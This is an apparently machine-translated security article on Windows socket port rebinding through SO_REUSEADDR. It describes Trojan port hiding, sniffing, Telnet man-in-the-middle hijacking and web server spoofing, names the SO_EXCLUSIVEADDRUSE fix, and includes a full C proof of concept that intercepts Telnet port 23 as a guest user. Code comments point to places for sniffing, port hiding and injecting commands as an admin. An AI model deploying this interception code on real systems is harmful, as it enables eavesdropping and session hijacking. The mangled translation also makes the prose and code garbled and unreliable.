Implement port hiding, sniffing, and attack through port listening Interception

Creation Time:
Article attributes: original
Article submitted: flashsky (flashsky1_at_sina.com)

Author: flashsky
Email: flashsky@xfocus.org
Site: www.xfocus.net www.shopsky.com
Reprinted, please indicate the original author's security focus

In the programming of socket server applications in windows, the following statements may be compared:
S = socket (af_inet, sock_stream, ipproto_tcp );
Saddr. sin_family = af_inet;
Saddr. sin_addr.s_addr = htonl (inaddr_any );
BIND (S, (sockaddr *) & saddr, sizeof (saddr ));
In fact, this is a big security risk, because in the implementation of WinSock, server binding can be bound in multiple ways. When determining who to use multiple bindings, according to one principle, the user who specifies the package is the most explicit and has no permissions. That is to say, users with low-level permissions can be rebound to high-level permissions, such as the port on which the service starts, this is a very important security risk.
What does this mean? This means that the following attacks can be performed:
1. A Trojan is bound to a valid port to hide the port. It uses its own package format to determine whether it is its own package. If it is handled by itself, if it is not through 127.0.0.1 address to the Real Server application for processing.
2. A Trojan can bind a port of a High-Permission service application to a low-Permission user to sniff the processing information, listening to a socket communication on a host requires a high level of permission. However, using Socket rebinding, you can easily listen for communication with this socket programming vulnerability, you do not need to use any hook, hook, or low-layer driver Technology (these must have the administrator privilege to achieve)
3. For some special applications, man-in-the-middle attacks can be initiated to obtain information from low-Permission users or to cheat the facts. For example, the man-in-the-middle attack can intercept port 23 of the Telnet server under the guest permission, if NTLM is used for encryption and authentication, although you cannot obtain the password through sniffing, once an admin user logs on to the console, your application can initiate man-in-the-middle attacks, assume that the login user sends a high-Permission command through the socket to achieve the purpose of intrusion.
4. for a built web server, intruders only need to obtain low-level permissions to completely change the web page. It is very easy to assume that your server responds to connection requests with other information, it is even based on e-commerce spoofing to obtain illegal data.

In fact, many of Ms's services have such a socket programming problem. telnet, FTP, and HTTP Service implementations can all use this method for attacks, the system application is intercepted on low-Permission users. The same is true for IIS, including w2k + SP3. If you have been able to intrude into or implant Trojans with low permissions and the other party has enabled these services, try again. In addition, I estimate that many third-party services also have this vulnerability.
The solution is very simple. before writing the above application, you need to use setsockopt to specify so_exclusiveaddruse to exclusively occupy all port addresses, instead of allowing reuse. In this way, other people cannot reuse this port.
The following is an example of a simple telnet server for intercept listening Ms. All the users in guest can successfully intercept listening. The rest is that you have made some special cropping issues based on your own needs: such as hiding, sniffing data, and high-Permission user spoofing.

# Include <winsock2.h>
# Include <windows. h>
# Include <stdio. h>
# Include <stdlib. h>

DWORD winapi clientthread (lpvoid lpparam );

Int main ()
{
Word wversionrequested;
DWORD ret;
Wsadata;
Bool val;
Sockaddr_in saddr;
Sockaddr_in scaddr;
Int err;
Socket S;
Socket SC;
Int caddsize;
Handle MT;
DWORD tid;

Wversionrequested = makeword (2, 2 );
Err = wsastartup (wversionrequested, & wsadata );
If (Err! = 0 ){
Printf ("error! Wsastartup failed! /N ");
Return-1;
}
Saddr. sin_family = af_inet;

// Although the intercept can also be set to inaddr_any, you should specify a specific IP address and leave 127.0.0.1 to the normal service application if it does not affect normal applications, then use this address for forwarding, so that the normal application of the other party is not affected.
Saddr. sin_addr.s_addr = inet_addr ("192.168.0.60 ");
Saddr. sin_port = htons (23 );
If (S = socket (af_inet, sock_stream, ipproto_tcp) = socket_error)
{
Printf ("error! Socket failed! /N ");
Return-1;
}
Val = true;
// The so_reuseaddr option enables port rebinding.
If (setsockopt (S, sol_socket, so_reuseaddr, (char *) & Val, sizeof (VAL ))! = 0)
{
Printf ("error! Setsockopt failed! /N ");
Return-1;
}
// If so_exclusiveaddruse is specified, no binding is successful and no error code is returned;
// If you want to hide the port by making full use of it, You can dynamically test which port can be successfully bound. This vulnerability indicates that the port can be used dynamically to make it more concealed.
// In fact, UDP ports can be rebound in this way. The Telnet service is used as an example to launch attacks.
If (BIND (S, (sockaddr *) & saddr, sizeof (saddr) = socket_error)
{
Ret = getlasterror ();
Printf ("error! Bind failed! /N ");
Return-1;
}
Listen (S, 2 );
While (1)
{
Caddsize = sizeof (scaddr );
// Accept the connection request
SC = accept (S, (struct sockaddr *) & scaddr, & caddsize );
If (SC! = Invalid_socket)
{
Mt = createthread (null, 0, clientthread, (lpvoid) SC, 0, & tid );
If (MT = NULL)
{
Printf ("thread creat failed! /N ");
Break;
}
}
Closehandle (MT );
}
Closesocket (s );
Wsacleanup ();
Return 0;
}

DWORD winapi clientthread (lpvoid lpparam)
{
Socket Ss = (socket) lpparam;
Socket SC;
Unsigned char Buf [4096];
Sockaddr_in saddr;
Long num;
DWORD val;
DWORD ret;
// If it is a hidden port application, you can add some judgments here
// If it is your own package, you can perform some special processing. Otherwise, you can forward it through 127.0.0.1.

Saddr. sin_family = af_inet;
Saddr. sin_addr.s_addr = inet_addr ("127.0.0.1 ");
Saddr. sin_port = htons (23 );
If (SC = socket (af_inet, sock_stream, ipproto_tcp) = socket_error)
{
Printf ("error! Socket failed! /N ");
Return-1;
}
Val = 100;
If (setsockopt (SC, sol_socket, so_rcvtimeo, (char *) & Val, sizeof (VAL ))! = 0)
{
Ret = getlasterror ();
Return-1;
}
If (setsockopt (SS, sol_socket, so_rcvtimeo, (char *) & Val, sizeof (VAL ))! = 0)
{
Ret = getlasterror ();
Return-1;
}
If (connect (SC, (sockaddr *) & saddr, sizeof (saddr ))! = 0)
{
Printf ("error! Socket connect failed! /N ");
Closesocket (SC );
Closesocket (SS );
Return-1;
}
While (1)
{
// The following code is mainly implemented through 127. 0. 0. 1. This address forwards the packet to the real application, and forwards the response packet back.
// If the content is sniffing, you can analyze and record the content here.
// If it is an attack such as a Telnet server, you can use its high-Permission login user to analyze its login user, and then use it to send a specific package for execution as a hijacked user.
Num = Recv (SS, Buf, 4096,0 );
If (Num> 0)
Send (SC, Buf, num, 0 );
Else if (num = 0)
Break;
Num = Recv (SC, Buf, 4096, 0 );
If (Num> 0)
Send (SS, Buf, num, 0 );
Else if (num = 0)
Break;
}
Closesocket (SS );
Closesocket (SC );
Return 0;
}